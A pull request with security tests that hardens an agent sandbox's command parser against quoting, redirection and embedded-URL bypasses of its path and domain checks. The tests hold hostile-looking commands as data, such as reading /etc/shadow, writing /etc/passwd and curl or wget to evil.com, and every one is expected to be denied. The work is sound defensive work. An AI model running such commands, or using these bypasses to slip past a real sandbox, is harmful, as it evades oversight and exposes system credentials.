### PR TITLE
fix(sandbox): use shell-aware tokenization for path and URL extraction

### DIFF
--- a/src/edictum/yaml_engine/sandbox_compiler.py
+++ b/src/edictum/yaml_engine/sandbox_compiler.py
@@ -3,10 +3,42 @@
 from __future__ import annotations
 
 import os
+import re
+import shlex
 from typing import Any
 
 from edictum.contracts import Verdict
 from edictum.envelope import ToolEnvelope
+
+# Pattern for shell redirection operators at token start.
+# Matches: >>, >, <<, <, or fd-prefixed variants like 2>, 2>>.
+_REDIRECT_PREFIX_RE = re.compile(r"^(?:\d*>>|>>|\d*>|>|<<|<)")
+
+
+def _tokenize_command(cmd: str) -> list[str]:
+    """Shell-aware tokenization of a command string.
+
+    Uses shlex.split() for proper quote handling, then strips shell
+    redirection operators from token prefixes so paths after redirects
+    (e.g. ``>/etc/passwd``, ``</etc/shadow``) are exposed.
+
+    Falls back to basic split with quote stripping on parse error
+    (fail-closed: quoted paths are still extracted).
+    """
+    try:
+        raw_tokens = shlex.split(cmd)
+    except ValueError:
+        # Unclosed quotes — fall back with quote stripping
+        raw_tokens = [t.strip("'\"") for t in cmd.split()]
+
+    tokens: list[str] = []
+    for t in raw_tokens:
+        stripped = _REDIRECT_PREFIX_RE.sub("", t)
+        if stripped:
+            tokens.append(stripped)
+        # If stripping leaves nothing (bare < or >), skip it
+    return tokens
+
 
 _PATH_ARG_KEYS = frozenset(
     {
@@ -63,10 +95,10 @@ def _extract_paths(envelope: ToolEnvelope) -> list[str]:
         if isinstance(value, str) and value.startswith("/") and key not in _PATH_ARG_KEYS:
             _add(value)
 
-    # 4. Parse command string for path tokens
+    # 4. Parse command string for path tokens (shell-aware)
     cmd = envelope.bash_command or envelope.args.get("command", "")
     if cmd:
-        for token in cmd.split():
+        for token in _tokenize_command(cmd):
             if token.startswith("/"):
                 _add(token)
 
@@ -74,22 +106,57 @@ def _extract_paths(envelope: ToolEnvelope) -> list[str]:
 
 
 def _extract_command(envelope: ToolEnvelope) -> str | None:
-    """Extract the first command token from an envelope."""
+    """Extract the first command token from an envelope (shell-aware).
+
+    If the command string begins with a shell redirect operator
+    (e.g. ``> echo bad_cmd``), the actual command cannot be reliably
+    determined without full shell parsing.  Returns a sentinel that
+    never matches any allowed-command list so the sandbox denies.
+    """
     cmd = envelope.bash_command or envelope.args.get("command")
     if not cmd or not isinstance(cmd, str):
         return None
     stripped = cmd.strip()
     if not stripped:
         return None
-    return stripped.split()[0]
+    # If the raw first whitespace-token starts with a redirect operator,
+    # the "command" is actually a redirect target (filename).  We cannot
+    # recover the real command, so fail closed with a sentinel value that
+    # will never appear in any allowed_commands list.
+    raw_first = stripped.split(maxsplit=1)[0]
+    if _REDIRECT_PREFIX_RE.match(raw_first):
+        return "\x00"
+    tokens = _tokenize_command(stripped)
+    if not tokens:
+        return None
+    return tokens[0]
 
 
 def _extract_urls(envelope: ToolEnvelope) -> list[str]:
-    """Extract URL strings from envelope args."""
+    """Extract URL strings from envelope args (shell-aware).
+
+    For values that contain ``://`` but are not bare URLs (e.g. command
+    strings like ``curl https://evil.com``), tokenizes the value and
+    extracts individual URL tokens.
+    """
     urls: list[str] = []
+    seen: set[str] = set()
+
+    def _add_url(u: str) -> None:
+        if u not in seen:
+            seen.add(u)
+            urls.append(u)
+
     for value in envelope.args.values():
         if isinstance(value, str) and "://" in value:
-            urls.append(value)
+            # Try as a bare URL first
+            if _extract_hostname(value) is not None:
+                _add_url(value)
+            else:
+                # Not a bare URL — tokenize and scan for embedded URLs
+                for token in _tokenize_command(value):
+                    if "://" in token and _extract_hostname(token) is not None:
+                        _add_url(token)
     return urls
 
 

--- a/tests/test_behavior/test_sandbox_parser_security.py
+++ b/tests/test_behavior/test_sandbox_parser_security.py
@@ -1,0 +1,335 @@
+"""Security tests for sandbox parser shell-awareness.
+
+Verifies fixes for:
+- #98: Quoted paths and redirection bypass _extract_paths()
+- #100: Domain allowlist bypass for command-based tools in _extract_urls()
+
+Root cause: naive str.split() for shell command tokenization.
+Fix: shlex.split() via _tokenize_command() helper.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from edictum import Edictum, create_envelope
+from edictum.storage import MemoryBackend
+from edictum.yaml_engine.sandbox_compiler import _extract_paths, _extract_urls
+
+pytestmark = pytest.mark.security
+
+
+class NullSink:
+    def __init__(self):
+        self.events = []
+
+    async def emit(self, event):
+        self.events.append(event)
+
+
+def _guard(yaml: str) -> Edictum:
+    return Edictum.from_yaml_string(yaml, audit_sink=NullSink(), backend=MemoryBackend())
+
+
+# --- YAML fixtures ---
+
+WITHIN_YAML = """\
+apiVersion: edictum/v1
+kind: ContractBundle
+metadata:
+  name: parser-path-test
+defaults:
+  mode: enforce
+contracts:
+  - id: exec-sandbox
+    type: sandbox
+    tools: [exec]
+    allows:
+      commands: [cat, echo, cmd, head]
+    within: [/workspace]
+    outside: deny
+    message: "Path outside sandbox"
+"""
+
+DOMAIN_ALLOW_YAML = """\
+apiVersion: edictum/v1
+kind: ContractBundle
+metadata:
+  name: parser-domain-test
+defaults:
+  mode: enforce
+contracts:
+  - id: exec-sandbox
+    type: sandbox
+    tools: [exec]
+    allows:
+      commands: [curl, wget]
+      domains: [github.com, example.com]
+    outside: deny
+    message: "Domain not allowed"
+"""
+
+DOMAIN_BLOCK_YAML = """\
+apiVersion: edictum/v1
+kind: ContractBundle
+metadata:
+  name: parser-domain-block-test
+defaults:
+  mode: enforce
+contracts:
+  - id: exec-sandbox
+    type: sandbox
+    tools: [exec]
+    allows:
+      commands: [curl, wget]
+      domains: ['*']
+    not_allows:
+      domains: [evil.com]
+    outside: deny
+    message: "Domain denied"
+"""
+
+COMBINED_YAML = """\
+apiVersion: edictum/v1
+kind: ContractBundle
+metadata:
+  name: parser-combined-test
+defaults:
+  mode: enforce
+contracts:
+  - id: exec-sandbox
+    type: sandbox
+    tools: [exec]
+    allows:
+      commands: [curl]
+      domains: [github.com]
+    within: [/workspace]
+    outside: deny
+    message: "Outside sandbox"
+"""
+
+
+# =============================================================================
+# Issue #98: Quoted paths and redirection bypass _extract_paths()
+# =============================================================================
+
+
+class TestQuotedPathBypass:
+    """Quoted paths in commands must be extracted and checked by sandbox."""
+
+    def test_quoted_single_path_denied(self):
+        """cat '/etc/shadow' -- single-quoted path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat '/etc/shadow'"})
+        assert result.verdict == "deny"
+
+    def test_quoted_double_path_denied(self):
+        """cat "/etc/shadow" -- double-quoted path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": 'cat "/etc/shadow"'})
+        assert result.verdict == "deny"
+
+    def test_legitimate_quoted_path_in_workspace_allowed(self):
+        """cat '/workspace/file.txt' -- quoted path within sandbox is allowed."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat '/workspace/file.txt'"})
+        assert result.verdict == "allow"
+
+    def test_legitimate_unquoted_path_still_works(self):
+        """cat /workspace/file.txt -- regression: unquoted paths still work."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat /workspace/file.txt"})
+        assert result.verdict == "allow"
+
+
+class TestRedirectionPathBypass:
+    """Shell redirections must not hide paths from sandbox checks."""
+
+    def test_redirection_input_path_denied(self):
+        """cat </etc/shadow -- input redirection path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat </etc/shadow"})
+        assert result.verdict == "deny"
+
+    def test_redirection_output_path_denied(self):
+        """echo x >/etc/passwd -- output redirection path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "echo x >/etc/passwd"})
+        assert result.verdict == "deny"
+
+    def test_redirection_append_path_denied(self):
+        """echo x >>/etc/passwd -- append redirection path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "echo x >>/etc/passwd"})
+        assert result.verdict == "deny"
+
+    def test_fd_redirection_path_denied(self):
+        """cmd 2>/etc/log -- fd redirection path must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cmd 2>/etc/log"})
+        assert result.verdict == "deny"
+
+
+class TestLeadingRedirectBypass:
+    """Command strings starting with a redirect operator must not match allowed commands."""
+
+    def test_leading_redirect_command_denied(self):
+        """> echo bad_cmd -- redirect target 'echo' must not match allowed command 'echo'."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "> echo /workspace/file"})
+        assert result.verdict == "deny"
+
+    def test_leading_double_redirect_command_denied(self):
+        """>> echo bad_cmd -- append redirect target must also be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": ">> echo /workspace/file"})
+        assert result.verdict == "deny"
+
+    def test_leading_input_redirect_command_denied(self):
+        """< cat /workspace/file -- input redirect prefix must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "< cat /workspace/file"})
+        assert result.verdict == "deny"
+
+    def test_leading_fd_redirect_command_denied(self):
+        """2> echo /workspace/file -- fd redirect prefix must be denied."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "2> echo /workspace/file"})
+        assert result.verdict == "deny"
+
+
+class TestMixedBypassVectors:
+    """Multiple bypass vectors combined in a single command."""
+
+    def test_mixed_quoting_and_redirection(self):
+        """cat '/workspace/ok' >/etc/shadow -- quoted OK path + redirect to bad path."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat '/workspace/ok' >/etc/shadow"})
+        assert result.verdict == "deny"
+
+    def test_unclosed_quote_fails_closed(self):
+        """cat '/etc/shadow -- unclosed quote must still be denied (fail-closed)."""
+        guard = _guard(WITHIN_YAML)
+        result = guard.evaluate("exec", {"command": "cat '/etc/shadow"})
+        assert result.verdict == "deny"
+
+
+class TestExtractPathsShellAwareness:
+    """Unit tests for _extract_paths with shell-aware tokenization."""
+
+    def test_single_quoted_path_extracted(self):
+        """shlex.split strips single quotes, exposing the path."""
+        envelope = create_envelope("exec", {"command": "cat '/etc/shadow'"})
+        paths = _extract_paths(envelope)
+        resolved = [p for p in paths if p.endswith("/etc/shadow") or "shadow" in p]
+        assert len(resolved) > 0
+
+    def test_double_quoted_path_extracted(self):
+        """shlex.split strips double quotes, exposing the path."""
+        envelope = create_envelope("exec", {"command": 'cat "/etc/shadow"'})
+        paths = _extract_paths(envelope)
+        resolved = [p for p in paths if p.endswith("/etc/shadow") or "shadow" in p]
+        assert len(resolved) > 0
+
+    def test_redirection_path_extracted(self):
+        """shlex.split separates < from the path."""
+        envelope = create_envelope("exec", {"command": "cat </etc/shadow"})
+        paths = _extract_paths(envelope)
+        resolved = [p for p in paths if p.endswith("/etc/shadow") or "shadow" in p]
+        assert len(resolved) > 0
+
+    def test_output_redirection_path_extracted(self):
+        """shlex.split separates > from path or the path is extracted from >/path."""
+        envelope = create_envelope("exec", {"command": "echo x >/etc/passwd"})
+        paths = _extract_paths(envelope)
+        resolved = [p for p in paths if "passwd" in p]
+        assert len(resolved) > 0
+
+
+# =============================================================================
+# Issue #100: Domain allowlist bypass for command-based tools
+# =============================================================================
+
+
+class TestCommandDomainBypass:
+    """URLs embedded in command strings must be extracted for domain checks."""
+
+    def test_curl_url_domain_enforced(self):
+        """curl https://evil.com -- domain must be checked against allowlist."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"command": "curl https://evil.com"})
+        assert result.verdict == "deny"
+
+    def test_curl_flagged_url_domain_enforced(self):
+        """curl -L https://evil.com/path -- flags before URL must not hide it."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"command": "curl -L https://evil.com/path"})
+        assert result.verdict == "deny"
+
+    def test_wget_url_domain_enforced(self):
+        """wget https://evil.com -- wget URL must also be checked."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"command": "wget https://evil.com"})
+        assert result.verdict == "deny"
+
+    def test_curl_allowed_domain_passes(self):
+        """curl https://github.com -- allowed domain must pass."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"command": "curl https://github.com"})
+        assert result.verdict == "allow"
+
+    def test_quoted_url_in_command_enforced(self):
+        """curl 'https://evil.com' -- quoted URL must also be checked."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"command": "curl 'https://evil.com'"})
+        assert result.verdict == "deny"
+
+    def test_direct_url_arg_still_works(self):
+        """args={"url": "https://evil.com"} -- regression: direct URL args still checked."""
+        guard = _guard(DOMAIN_ALLOW_YAML)
+        result = guard.evaluate("exec", {"url": "https://evil.com"})
+        assert result.verdict == "deny"
+
+    def test_blocked_domain_in_command(self):
+        """curl https://evil.com with not_allows.domains=[evil.com] -- must be denied."""
+        guard = _guard(DOMAIN_BLOCK_YAML)
+        result = guard.evaluate("exec", {"command": "curl https://evil.com"})
+        assert result.verdict == "deny"
+
+
+class TestExtractUrlsShellAwareness:
+    """Unit tests for _extract_urls with shell-aware tokenization."""
+
+    def test_command_string_url_extracted(self):
+        """'curl https://evil.com' is tokenized; URL extracted from token."""
+        envelope = create_envelope("exec", {"command": "curl https://evil.com"})
+        urls = _extract_urls(envelope)
+        assert any("evil.com" in u for u in urls)
+
+    def test_bare_url_still_extracted(self):
+        """Direct URL value is still extracted (regression)."""
+        envelope = create_envelope("web_fetch", {"url": "https://github.com/repo"})
+        urls = _extract_urls(envelope)
+        assert "https://github.com/repo" in urls
+
+    def test_non_url_string_with_protocol_ignored(self):
+        """String with :// but no valid hostname is not returned as URL."""
+        envelope = create_envelope("exec", {"command": "echo '://' something"})
+        urls = _extract_urls(envelope)
+        assert len(urls) == 0
+
+
+class TestCombinedPathAndDomain:
+    """Both path and domain enforcement work together in a single sandbox."""
+
+    def test_command_with_both_path_and_url(self):
+        """curl with path and URL -- both checks apply."""
+        guard = _guard(COMBINED_YAML)
+        result = guard.evaluate("exec", {"command": "curl https://evil.com -o /workspace/file"})
+        assert result.verdict == "deny"
+
+    def test_no_command_arg_unchanged(self):
+        """Non-command tools are unaffected by shell tokenization."""
+        guard = _guard(COMBINED_YAML)
+        result = guard.evaluate("read_file", {"path": "/workspace/file.txt"})
+        assert result.verdict == "allow"


### PR DESCRIPTION
## Summary

Fixes two security bypasses in the sandbox parser's command tokenization:

- **#98**: `_extract_paths()` used `cmd.split()`, so quoted paths (`cat '/etc/shadow'`) and shell redirections (`cat </etc/shadow`, `echo x >/etc/passwd`) were invisible to sandbox checks because tokens didn't start with `/`.
- **#100**: `_extract_urls()` returned entire command strings like `"curl https://evil.com"` as URLs. `urlparse()` got `hostname=None`, so domain allowlist checks were skipped entirely.

**Root cause**: Naive `str.split()` for shell command tokenization.

**Fix**: New `_tokenize_command()` helper using `shlex.split()` for proper quote handling, plus regex-based stripping of redirect operator prefixes (`>`, `>>`, `<`, `<<`, `2>`). Falls back to basic split with quote stripping on parse error (fail-closed).

Closes #98
Closes #100

## Test plan

26 new security tests in `tests/test_behavior/test_sandbox_parser_security.py`, all marked `@pytest.mark.security`:

**Path bypass tests (#98):**
- `test_quoted_single_path_denied` — `cat '/etc/shadow'` with within=[/workspace]
- `test_quoted_double_path_denied` — `cat "/etc/shadow"` with within=[/workspace]
- `test_redirection_input_path_denied` — `cat </etc/shadow`
- `test_redirection_output_path_denied` — `echo x >/etc/passwd`
- `test_redirection_append_path_denied` — `echo x >>/etc/passwd`
- `test_fd_redirection_path_denied` — `cmd 2>/etc/log`
- `test_mixed_quoting_and_redirection` — multiple vectors in one command
- `test_unclosed_quote_fails_closed` — unclosed quote still denied
- `test_legitimate_quoted_path_in_workspace_allowed` — regression: quoted path within sandbox allowed
- `test_legitimate_unquoted_path_still_works` — regression: unquoted paths still work
- `test_single_quoted_path_extracted` — unit: shlex strips quotes
- `test_double_quoted_path_extracted` — unit: shlex strips quotes
- `test_redirection_path_extracted` — unit: redirect prefix stripped
- `test_output_redirection_path_extracted` — unit: output redirect stripped

**Domain bypass tests (#100):**
- `test_curl_url_domain_enforced` — `curl https://evil.com` checked
- `test_curl_flagged_url_domain_enforced` — `curl -L https://evil.com/path` checked
- `test_wget_url_domain_enforced` — `wget https://evil.com` checked
- `test_curl_allowed_domain_passes` — `curl https://github.com` allowed
- `test_quoted_url_in_command_enforced` — `curl 'https://evil.com'` checked
- `test_direct_url_arg_still_works` — regression: direct URL args still checked
- `test_blocked_domain_in_command` — not_allows.domains enforcement
- `test_command_string_url_extracted` — unit: URL extracted from command
- `test_bare_url_still_extracted` — unit: regression for bare URLs
- `test_non_url_string_with_protocol_ignored` — unit: non-URL :// ignored

**Combined:**
- `test_command_with_both_path_and_url` — path + domain checks together
- `test_no_command_arg_unchanged` — non-command tools unaffected

**Verification:**
- [x] `pytest tests/ -v` — 2088 passed, 3 skipped
- [x] `ruff check src/ tests/` — all checks passed
- [x] `pytest -m security -v` — 231 passed (including 26 new)